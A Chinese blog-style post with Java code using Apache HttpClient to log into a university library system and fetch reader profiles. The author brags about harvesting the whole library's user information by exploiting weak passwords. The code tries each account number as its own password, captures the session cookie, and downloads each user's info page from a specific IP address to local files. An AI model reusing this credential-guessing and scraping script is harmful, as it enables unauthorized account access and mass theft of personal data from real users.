使用HttpClient开源工具包访问网络比HttpURLConnection省了不少事
步骤如下:
1.使用HttpPost提交表单数据,比如用户名密码什么的,HttpClient.getCookieStore().getCookies(),拿到到登陆Cookie
2.使用HttpGet获取要得到的页面,执行的时候带上得到的Cookie数据才能正确访问
我就抓取到了整个学校图书馆的用户信息啊哈哈哈(弱密码)
代码如下
package njupt;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.Consts;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.cookie.Cookie;
import org.apache.http.impl.client.AbstractHttpClient;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import DBUtil.BaseDao;
public class HttpUtil {
public Cookie postData(String name) {
String URL = "www.xxxxx.com";
HttpClient client = new DefaultHttpClient();
HttpPost httpPost = new HttpPost(URL);
HttpResponse response = null;
int responseCode = -1;
List<NameValuePair> formparams = new ArrayList<NameValuePair>();
formparams.add(new BasicNameValuePair("number", name));
formparams.add(new BasicNameValuePair("passwd", name));
formparams.add(new BasicNameValuePair("select", "cert_no"));
UrlEncodedFormEntity entity = new UrlEncodedFormEntity(formparams,
Consts.UTF_8);
httpPost.setEntity(entity);
try {
response = client.execute(httpPost);
responseCode = response.getStatusLine().getStatusCode();
} catch (IOException e) {
e.printStackTrace();
}
httpPost.releaseConnection();
if (responseCode == 302) {
System.out.println("302");
List<Cookie> list = ((AbstractHttpClient) client).getCookieStore()
.getCookies();
Cookie c = list.get(0);
return c;
} else {
System.out.println("passwd is wrong or something else is happened");
}
return null;
}
public void getContent(Cookie c, String name) {
if (c == null) {
System.out.println("Cookie 获取失败,获取下一个帐号信息。。。");
return;
}
HttpResponse response = null;
InputStream inStream = null;
String url = "http://202.119.228.6:8080/reader/redr_info.php";
HttpClient client = new DefaultHttpClient();
HttpGet httpGet = new HttpGet(url);
httpGet.setHeader("Cookie", c.getName() + "=" + c.getValue());
try {
response = client.execute(httpGet);
inStream = response.getEntity().getContent();
inputStream2File(name, inStream);
} catch (IllegalStateException | IOException e) {
e.printStackTrace();
} finally {
try {
inStream.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
public void inputStream2File(String fileName, InputStream inStream) {
String path = "/home/zlidentify/njupt/" + fileName;
try {
OutputStream os = new FileOutputStream(path);
byte[] buff = new byte[1024];
int len = -1;
while ((len = inStream.read(buff)) != -1) {
os.write(buff, 0, len);
}
os.flush();
os.close();
} catch (IOException e) {
System.out.println("写入文件异常--->"+fileName);
e.printStackTrace();
}
System.out.println("写入文件成功---->" + path);
}
}
发现个更好的博客http://blog.csdn.net/kevinpake/article/details/12981301